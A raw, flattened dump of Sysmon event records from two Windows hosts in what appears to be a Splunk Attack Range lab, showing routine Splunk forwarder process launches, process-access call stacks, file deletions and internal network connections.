16:32:25.049{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061585Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.049{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-5299-6063-3801-00000000AF01}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061584Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.049{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5299-6063-3801-00000000AF01}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061583Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.051{7F8C56E7-5299-6063-3801-00000000AF01}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246473Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:25.539{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE49B7885657B9AFCEEFE3BF7D4C7FF6,SHA256=E5E3D9D5AE57BCE1637A48D8A14CFF3C310D71FB4380638DEE0DAC01797BBC94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246472Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:25.242{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F413DDFBF7CB494C661A3B3AE2E558E8,SHA256=5A2C1371E25B16B1E99031121B6ACE861F67AF60EB73EF8380E02257662BA811,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061610Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.552{7F8C56E7-529A-6063-3A01-00000000AF01}23885532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061609Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.427{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-529A-6063-3A01-00000000AF01}2388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061608Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.427{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061607Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.427{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061606Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.427{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061605Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.427{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061604Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.427{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-529A-6063-3A01-00000000AF01}2388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061603Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.427{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-529A-6063-3A01-00000000AF01}2388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061602Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:26.428{7F8C56E7-529A-6063-3A01-00000000AF01}2388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246474Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:26.539{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C557F5051C818F8BCB2B45BC8124CCB,SHA256=A7CF2C1DFD31FF44BDD058ABE23726EA97ACBD82381E5930B1E571DA8882829B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061620Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.818{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D94EEBA60BEE8CEC17F123B19AFEE40,SHA256=22685C5CD4C1B8CF17C7EC67EAA8DA61674A9C6A3BCE012455CCFEDD412EEB64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061619Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.146{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EBD20E3FBC7029CAC027A4C49333579,SHA256=BDCA904785FD8AF6F3DF6570DCA12D2CCB2B1D47AA7CBE47339896F7609BEA18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061618Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.146{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-529B-6063-3B01-00000000AF01}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061617Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.146{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061616Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.146{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061615Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.146{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061614Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.146{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061613Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.146{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-529B-6063-3B01-00000000AF01}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061612Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.146{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-529B-6063-3B01-00000000AF01}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061611Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:27.147{7F8C56E7-529B-6063-3B01-00000000AF01}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246476Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:27.539{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42A11B69476AE1DDD3A4D992BAF42CAF,SHA256=8BF1AF53B61BB15617B60F08FEB6ED86EB570CE1711AFF1EF519B060E768588D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246475Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:25.660{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64816-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061621Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:28.537{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26B0BE9185F9E0BEA3D96636DE7C13B9,SHA256=2283907999A9FD461FF847511C965523E9BB4CF52C42932CBC6D6A22B0A99FB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246477Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:28.554{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85810EEC26267AB0DC3AA1779E727B78,SHA256=29DE70830852697A9EBAE374AD9CBF72EC46E19D81776709E247243900A47535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061623Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:29.912{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28796B4801DE915407B326CA69A0A8A6,SHA256=A4F17A17D77701E1775B5093FF763248335ACCB0E599C24F297EDF3F144CB567,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061622Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.991{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54848-false10.0.1.12-8000- 23542300x8000000000000000246478Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:29.554{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD504A11D15CDB2012AF014FD6D16045,SHA256=C3365FFBC364A8F92F28A28D389A167CFA0017162DF4DB695A25807A10165E56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246479Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:30.570{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E503D2EFBE381381A58F887F88DEEF3,SHA256=E036B1EB32F28C92B941BE272F3A5820CB6B7D9E541F50814DA8CC82D399BD44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061624Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:31.271{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 